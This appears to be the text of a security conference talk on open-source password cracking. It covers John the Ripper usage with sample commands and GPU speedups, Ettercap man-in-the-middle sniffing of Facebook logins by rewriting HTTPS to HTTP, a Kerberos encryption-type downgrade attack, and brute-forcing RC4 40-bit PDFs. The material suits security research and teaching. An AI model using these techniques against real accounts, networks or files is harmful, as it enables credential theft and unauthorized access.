Download - Advances in Open Source Password Cracking
Agenda
John the Ripper
Ettercap
Attacks on M$ AD / Kerberos infrastructure
Misc. Stuff
Current and future work
John the Ripper
John the Ripper is a free open-source password cracking software tool (http://www.openwall.com/)
Traditionally supports cracking hashes (LM, FreeBSD, DES crypt etc.)
$ cat lm-hash
user:fda95fbeca288d44aad3b435b51404ee
$ john -format:lm lm-hash
Loaded 1 password hash (LM ...)
HELLO (user)
Jumbo patch
community-enhanced version of JtR, available in almost all Linux distributions
Add tons of formats for cracking hashes as well as “non-hashes”
Hashes: e.g. MD5, LM
“non-hashes” : e.g. PDF or other types of files
Can use GPU to accelerate cracking (Speedups > 150X possible)
Jumbo patch supports cracking
1Password, Clipperz, Apple DMG images, EncFS, EPiServer, GPG private keys, IKE PSK, Apple Keychain, GNOME Keyring, KDE KWallet, KeePass, LastPass, Mozilla Master Passwords, MongoDB, MS-CHAP, MySQL authentication protocol, M$ Office, OpenOffice, PDF, O5LOGON, Password Safe, ZIP, RAR, Apple 10.8 hashes, GRUB 2, PFX, SSH keys, PuTTY keys, PostgresSQL, M$ PST, RACF, etc
Above list *only* includes formats I have worked on
Lot of these formats are faster than commercial products.
Many formats are not even supported by commercial products
Example: cracking password protected
SSH keys
Two-step process
Use one of the many *2john utilities
$ sshng2john.py key-catch22 > ssh-hash
$ john ssh-hash
Loaded 1 password hash (ssh-ng ...)
catch22 (key-catch22)
Example: using GPU
Build GPU-enabled JtR (e.g. make linux-x86-64-opencl)
$ john -fo:keychain -t
Benchmarking: Mac OS X Keychain ...
Raw: 1331 c/s real, 1331 c/s virtual
$ john -fo:keychain-opencl -t # ATI 7970 GPU
OpenCL platform 1: AMD Accelerated Parallel Processing ...
Benchmarking: Mac OS X Keychain ...
Raw: 208537 c/s real, 92758 c/s virtual
Greater than 150X speedup
JtR community
http://www.openwall.com/lists/john-users/
Join “john-users” mailing list for general discussion and help
Join “john-dev” if you are interested in JtR development
#openwall channel on Freenode IRC network
Writing a plug-in (called format) is easy enough (start contributing!)
https://github.com/magnumripper/JohnTheRipper
Ettercap
Ettercap is free, open source network security tool
for doing MiTM attacks.
Allows interception and modifications of packets
on the fly.
Can be extended by writing plug-ins
Example: Facebook password sniffing
Facebook loads login form over HTTP which
POSTs credentials to a HTTPS link.
Modified HTTP dissector (ec_http.c) to replace
“https” with “ http”.
Login form is now posted over HTTP
Ettercap filter functionality can be used to do the
same.
Example: Facebook password sniffing
Only 12 lines of code added to ec_http.c
6 lines to avoid gzip encoding and 6 lines to avoid SSL
Example: works for Flipkart and
Rediffmail too
Ettercap automatically prints credentials sent over
HTTP
Don’t expose / load resources over HTTP
Ettercap: My contributions
MySQL v5 challenge-response
PostgreSQL challenge-response
VNC challenge-response
O5LOGON protocol (used by Oracle DB)
MongoDB challenge-response
Kerberos MiTM etype downgrade attack
MongoDB MiTM fixed salt attack
Ettercap community
https://github.com/Ettercap/
#ettercap-project channel on Freenode IRC
network
Writing a plug-in (called dissector) is easy once the
protocol is understood (use Wireshark)
Attacks on Kerberos and M$ AD
infrastructure
Popular network authentication protocol used to implement SSO
Uses shared secret/symmetric keys (which don’t travel over the network)
Uses timestamp pre-authentication in which timestamp is encrypted with a key (derived from the user password)
We capture encrypted timestamp and mount offline brute-force attack
Kerberos: Key Derivation
The “string-to-key” function used to convert a user
password to a secret key in Kerberos is dependent
upon the encryption type (called etype) being used.
etype functions differ in cost
etype negotiation process can be attacked to
downgrade etype (and make offline attacks faster)
Kerberos: etype downgrade attacks
Downgrade etype 18 (aes256-cts-hmac-sha1-96, very expensive) to etype 23 (rc4-hmac, very fast)
etype 18 brute-force attack, 380 tries per second on CPU, 125K on ATI 7970 GPU
etype 23 brute-force attack, 728K tries per second on CPU
Speedup > 1900X
Kerberos: etype downgrade attacks
These attacks have been talked about previously
but tools were not published (maybe not even
made).
My Ettercap plug-in is the first public tool to make
these attacks practical.
Only 16 lines of code.
Misc : Guaranteed cracking of PDF
files using RC4 40-bit encryption
RC4 40-bit is still popular among banks and income tax department.
https://github.com/kholia/RC4-40-brute-pdf
https://github.com/kholia/qpdf
Should take less than 2 days on AMD FX-8120 (8-core Bulldozer)
Misc : Guaranteed cracking of PDF
files using RC4 40-bit encryption
Three-step process
$ npdf2john test.pdf
test.pdf:$npdf$1*2*40*4*1*16*c56b…
$ RC4-40-brute ‘test.pdf:$npdf$1*2*40*4…’
Key is : 9296c944ee
$ qpdf --key=9296c944e --decrypt test.pdf output.pdf
Current and future work
Dropbox account “hijacker”
Metasploit post script for doing the same
Offline attacks on LastPass password manager
Fake VMware vCenter (and ESX) server for Metasploit project
Fake LDAP server for Metasploit project
Questions